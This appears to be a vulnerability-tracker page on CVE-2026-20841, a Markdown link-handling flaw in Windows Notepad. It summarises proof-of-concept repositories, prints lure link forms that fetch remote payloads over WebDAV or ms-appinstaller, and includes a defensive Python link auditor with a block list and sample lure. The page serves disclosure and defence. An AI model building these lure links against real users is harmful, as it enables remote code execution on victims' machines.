Remote Code Execution in Windows Notepad App via Markdown Link Handling
CVE-2026-20841 is a command injection vulnerability in the modern Windows Notepad application distributed via the Microsoft Store. The flaw is in Notepad’s Markdown rendering and hyperlink handling logic for .md files: when a user opens a crafted Markdown file and activates a malicious link, Notepad can pass insufficiently sanitized URI/protocol input to the operating system, including dangerous schemes such as file:// and ms-appinstaller://. Multiple reports indicate the vulnerable path ultimately invokes system protocol handling with inadequate validation, enabling attacker-controlled local or remote content to be launched. The issue affects the modern Notepad app with Markdown support, not the legacy notepad.exe, and affected versions are reported as 11.0.0 through versions prior to 11.2510 (also described in some reporting as 11.2508 and earlier).
Exploits
This repository is a small multi-language proof-of-concept generator for alleged CVE-2026-20841 affecting Microsoft Windows Notepad. It contains three equivalent scripts in JavaScript, Python, and VBScript plus a README. Each script accepts <host> <port> <payload-filename>, validates the port, constructs a UNC/WebDAV-style file URI of the form file:///\\host@port\DavWWWRoot\payload, and writes a Markdown file named poc.md containing a clickable link labeled 'Execute Payload'. The intended attack flow is social-engineering based: the victim opens poc.md in modern Windows Notepad and clicks the embedded link, causing Notepad/Windows to access a remote attacker-controlled WebDAV resource. The code does not implement a WebDAV server, memory corruption, shellcode, or a full RCE chain; it only generates the lure document and relies on external infrastructure and user interaction. Structurally, the repository is straightforward: three standalone entry points with near-identical logic and a README describing the claimed vulnerability, affected products, impact, and defensive guidance. Overall, this is best classified as a PoC/lure generator rather than a weaponized exploit.
Repository contains a minimal, user-assisted PoC for CVE-2026-20841 described as a Windows Notepad (< 11.2510) issue enabling “remote code execution” via a specially crafted Markdown file. There is no exploit code in a traditional sense (no scripts/binaries); the core artifact is `poc.md`, which embeds (1) a GitHub raw HTTPS link to download an external executable (`poc.exe`) and (2) a local Windows path link (`C:\Users\user\Downloads\poc.exe`) intended to run that executable after download. The exploit capability is therefore a social-engineering click-through chain that results in execution of an externally hosted payload, contingent on Notepad’s handling of Markdown links and the user clicking them in sequence. Structure: LICENSE (MIT), README.md (requirements and steps), and poc.md (the crafted Markdown with the two links).
Repository is a small proof-of-concept for CVE-2026-20841, described as a Windows Notepad Markdown renderer issue where URL protocols are not restricted, allowing clickable links to invoke arbitrary protocol handlers. Structure and purpose:
- README.md: Explains the vulnerability concept and three user-assisted vectors: (1) file:/// resolving to remote UNC/WebDAV paths to fetch/execute a payload, (2) ms-appinstaller:// to open App Installer with a remote .appx/.msix source, and (3) file:// to launch local executables.
- poc.js and poc.py: Two equivalent generators (Node.js and Python) that create a malicious Markdown file named poc.md. They take <host> <port> <payload-path> and embed a link of the form file:///\\<host>@<port>\DavWWWRoot\<payload-path>.
- poc.md: Example generated output containing a link to file:///\\192.168.1.100@5005\DavWWWRoot\hello.vbs.
- hello.py and hello.vbs: Benign demo payloads (message box) to demonstrate code execution when the link is clicked.
Exploit capabilities:
- Generates a crafted Markdown document that, when opened in vulnerable Notepad and clicked, causes Windows to resolve and open a remote UNC/WebDAV resource (or other protocol handlers described in the README). This can lead to execution of remote content depending on file association/interpreter availability and Windows security prompts.
No scanning, brute force, or automatic exploitation is present; it is a user-assisted PoC generator focused on producing the malicious link and demonstrating payload execution behavior.
Repository contains a minimal proof-of-concept for CVE-2026-20841 affecting the Microsoft Store version of Windows Notepad (builds prior to 11.2510). Structure:
- README.md: Describes the claimed vulnerability (Markdown link rendering fails to validate/sanitize URI schemes), impact (RCE), affected versions, and remediation. Includes two PoC link examples.
- PoC.md: The actual clickable Markdown payload demonstrating two vectors.
Exploit capability: user-assisted code execution by embedding malicious hyperlinks in a Markdown file opened in Notepad. When the victim clicks the link, Notepad passes the URI to Windows protocol handling without proper validation. Demonstrated outcomes include (1) invoking the ms-appinstaller protocol to fetch/install a remote .appx from an attacker-controlled HTTPS URL, and (2) launching a local executable via a file:// URI (cmd.exe shown). No automation, shellcode, or post-exploitation logic is included; it is a conceptual/interaction-based PoC rather than a full weaponized exploit.
Repository is a small proof-of-concept for CVE-2026-20841 (“Windows Notepad RCE”) centered on abusing Notepad’s Markdown link handling to launch a file:/// URL that points to a remote UNC path (WebDAV/SMB). The repo contains two standalone generators (poc.js and poc.py) that take <webdav-server-host> <port> <server/path/to/payload> and write a local markdown file (poc.md) embedding a link of the form file:///\\host@port\DavWWWRoot\payload. The intended attack flow is: attacker hosts a payload on a WebDAV/SMB server; victim opens poc.md in Notepad and clicks the link; Windows fetches/opens the remote file, potentially executing it via file association (e.g., .py if Python is installed). The README documents limitations: many executable/script extensions trigger Windows warnings; using .py or .jar may bypass warnings if the interpreter/runtime is installed. sample-payloads/ provides benign demo payloads (hello.py shows a Windows MessageBox via ctypes; hello.vbs shows a VBScript MsgBox). No scanning, persistence, or C2 is implemented—this is a link-generation PoC rather than a full exploitation framework.
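As an added defensive check (example code written for this page, not from any of the repositories described above): a Python auditor that classifies every inline or reference-style link target in a Markdown file, blocking the file: and ms-appinstaller: schemes, the \\host@port\DavWWWRoot WebDAV shape and drive-letter local paths that the PoCs rely on, and flagging any other non-web scheme for review. The sample lure document is constructed and uses example.invalid hosts; the scheme lists are assumptions drawn from this page.

```python
import re
from typing import List, Tuple

# [text](target) and reference definitions "[id]: target"; autolinks and
# HTML anchors are out of scope for this example.
INLINE_LINK = re.compile(r"\[[^\]]*\]\(\s*<?([^)\s>]+)>?[^)]*\)")
REF_DEF = re.compile(r"^\s*\[[^\]]+\]:\s*<?(\S+)>?", re.MULTILINE)
SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.-]*):")
# Remote UNC/WebDAV target shape used by the PoC generators: \\host@port\DavWWWRoot\...
WEBDAV_UNC = re.compile(r"[\\/]{2,}[^\\/@\s]+@\d+[\\/]DavWWWRoot", re.IGNORECASE)
# Drive-letter local path, bare or wrapped in file:, pointing at something on disk
LOCAL_PATH = re.compile(r"^(?:file:/*)?[a-zA-Z]:[\\/]", re.IGNORECASE)

SAFE_SCHEMES = {"http", "https", "mailto"}
HANDLER_SCHEMES = {"file", "ms-appinstaller"}  # the two schemes named in this advisory


def classify(target: str) -> str:
    """Return 'block', 'review' or 'ok' for one link target."""
    t = target.strip().strip("<>")
    if WEBDAV_UNC.search(t) or LOCAL_PATH.match(t):
        return "block"
    m = SCHEME.match(t)
    if m is None:
        return "ok"  # relative path or #anchor: no protocol handler involved
    scheme = m.group(1).lower()
    if scheme in HANDLER_SCHEMES:
        return "block"
    if scheme in SAFE_SCHEMES:
        return "ok"
    return "review"  # some other registered handler: inspect before opening


def audit_markdown(text: str) -> List[Tuple[str, str]]:
    """Return (verdict, target) for each link that is not plainly safe."""
    targets = INLINE_LINK.findall(text) + REF_DEF.findall(text)
    return [(classify(t), t) for t in targets if classify(t) != "ok"]


# Constructed sample lure, modelled on the poc.md files described above.
SAMPLE_MD = r"""# Release notes
[Execute Payload](file:///\\192.168.1.100@5005\DavWWWRoot\hello.vbs)
[Download](https://raw.githubusercontent.com/example/repo/main/poc.exe)
[Run it](C:\Users\user\Downloads\poc.exe)
[Install](ms-appinstaller://?source=https://example.invalid/app.msix)
[Readme](./README.md)
[Mirror]: ftp://example.invalid/app.msix
"""

if __name__ == "__main__":
    for verdict, target in audit_markdown(SAMPLE_MD):
        print(f"{verdict:6} {target}")
```

Run against a mail gateway or endpoint quarantine folder, a "block" verdict is the signal to hold the .md file before a user can open it in Notepad.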
Recent activity
Remote code execution vulnerability in the Windows Notepad app. This month only an FAQ was added, and it is mentioned as an informational update.
A Windows Notepad remote code execution vulnerability where a malicious link in a Markdown file can trigger an unvalidated protocol handler, leading to loading/executing a remote file.
High-severity remote code execution vulnerability in the modern Windows Notepad app (with Markdown support/clickable links) where a crafted Markdown file and user interaction (opening the file and clicking a malicious link) can lead to code execution in the context of the logged-in user.
A high-severity command-injection-driven remote code execution issue in the modern Microsoft Store Windows Notepad Markdown link handling, where insufficient filtering of hyperlink URIs passed to ShellExecuteExW() enables execution via malicious protocols (e.g., file://, ms-appinstaller://) after user interaction.